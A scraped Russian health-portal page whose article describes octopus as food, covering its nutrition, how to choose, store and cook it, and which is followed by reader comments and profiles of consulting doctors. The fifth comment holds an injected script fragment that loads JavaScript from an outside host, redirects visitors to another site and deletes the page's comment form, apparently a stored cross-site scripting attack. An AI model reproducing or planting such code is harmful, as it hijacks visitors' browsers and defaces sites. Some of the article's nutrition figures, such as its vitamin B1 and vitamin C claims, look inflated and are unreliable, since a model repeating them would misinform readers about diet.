Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Осьминог – еда для нервно...  >>  Осьминог – еда для нервной деятельности
 
Обратная связь
 

Осьминог – еда для нервной деятельности

Размер шрифта
08 февраля 2012 10:48
  • google_analytics: false
  • Нравится

Это головоногое обладает серым веществом и голубой кровью. Мало того, он крайне полезен, с какой стороны на него ни посмотри. Как выбрать осьминога, как его хранить и с чем подать к столу.

1

Осьминог – хищник, он питается рыбой. У него 3 сердца: одно отвечает за циркуляцию крови, два других – за дыхание. Вот почему осьминог может жить и в воде, и даже какое-то время на воздухе. У осьминога 8 ног и на каждой – по 2 тысячи присосок. Сила присасывания – примерно 100 граммов на каждую присоску.

Достоинства мяса осьминога

  • Мясо осьминога – это белок в чистом виде.
  • В мясе осьминога есть омега-3 жирные кислоты: он питается морской рыбой и сам является морским существом.
  • В мясе осьминога практически нет углеводов, зато много витаминов группы B: тиамин, B1, рибофлавин B2 и большое количество витамина С. Без нормального уровня витамина B1 в нашем организме накапливается пировиноградная и молочная кислоты. Если этих кислот в организме много, они подавляют секрецию ацетилхолина. Ацетилхолин участвует в передаче сигнала в нервной клетке. Если нет передачи нервного сигнала, это будет отражаться на двигательной активности и на умственной деятельности.
  • Микроэлементов в мясе осьминога тоже достаточно: калий (320 мг на 100 г), натрий.
  • Калорийность мяса осьминога не превышает 60 ккал на 100 г.

Пьедестал почета по количеству витамина B1 на 100 г:

1. Осьминог 5 мг
2. Кальмар 1,5 мг
3. Креветки 1,4 мг

Как выбрать

  1. Загляните в глаза осьминогу. Если они прозрачные, это хорошо. Если мутные – откажитесь от покупки.

  2. Кожа не должна быть порванной, не должна отслаиваться.

  3. Цвет – светло-коричневый.

  4. Если покупаете консервированных осьминогов, ориентируйтесь на дату упаковки, срок хранения и отсутствие ненужных ингредиентов.

Как хранить

  1. Лучше всего свежего осьминога отварить и положить в вакуумную упаковку, заморозить и только тогда хранить. Сырым хранить нельзя, даже в заморозке.

  2. Свежего осьминога можно хранить даже в вакууме не больше 3-х дней.

Как съесть

  1. Народы Малайзии едят осьминога сырым, пока еще щупальца шевелятся.

  2. Прежде чем отварить мясо, надо его отбить – оно будет мягче.

  3. Перед тем, как варить, надо опустить в кипящую воду несколько раз. Иначе кожица будет рваться.

  4. Варится 20-30 минут в воде без соли со специями.

  5. Можно потушить осьминога. Сделать к нему овощи al dente, не добавляя масла. Получится теплый салат с осьминогом.



Cюжеты по теме:
Готовим блюда из осьминога

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

08 февраля 2012 в 16:27

Цитировать   |   Пожаловаться

ДЛЯ КОГО ЭТА СТАТЬЯ (да и многие другие тоже)? ну полная фигня! народ, по-вашему, только и делает после работы, что осьминогам в магазине в глаза заглядывает? зарплаты только на одного осьминога и хватит!

И следите, пожалуйста, за грамотностью изложения: у вас написано с какой стороны на него не посмотри, а надо бы ни! светло коричневый пишется раздельно, а не как у вас. И это не опечатки, а безграмотность.

Гость 08 февраля 2012 в 16:27
И это не опечатки, а безграмотность
 Вы правы, ошибки в печатном тексте недопустимы. Спасибо за внимание. 

3 - Гость

09 февраля 2012 в 19:46

Цитировать   |   Пожаловаться

Гость 08 февраля 2012 в 16:27
светло коричневый пишется раздельно
 Через дефис.

4 - Гость

29 ноября 2014 в 20:43

Цитировать   |   Пожаловаться

Да у нас в Измайлове в какой магазин ни зайди - одни  свежие кальмары плавают на прилавках! Такая простая русская еда! Чего-то другого (например, ветчинки-колбаски-мясца) и не хочется даже...

5 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.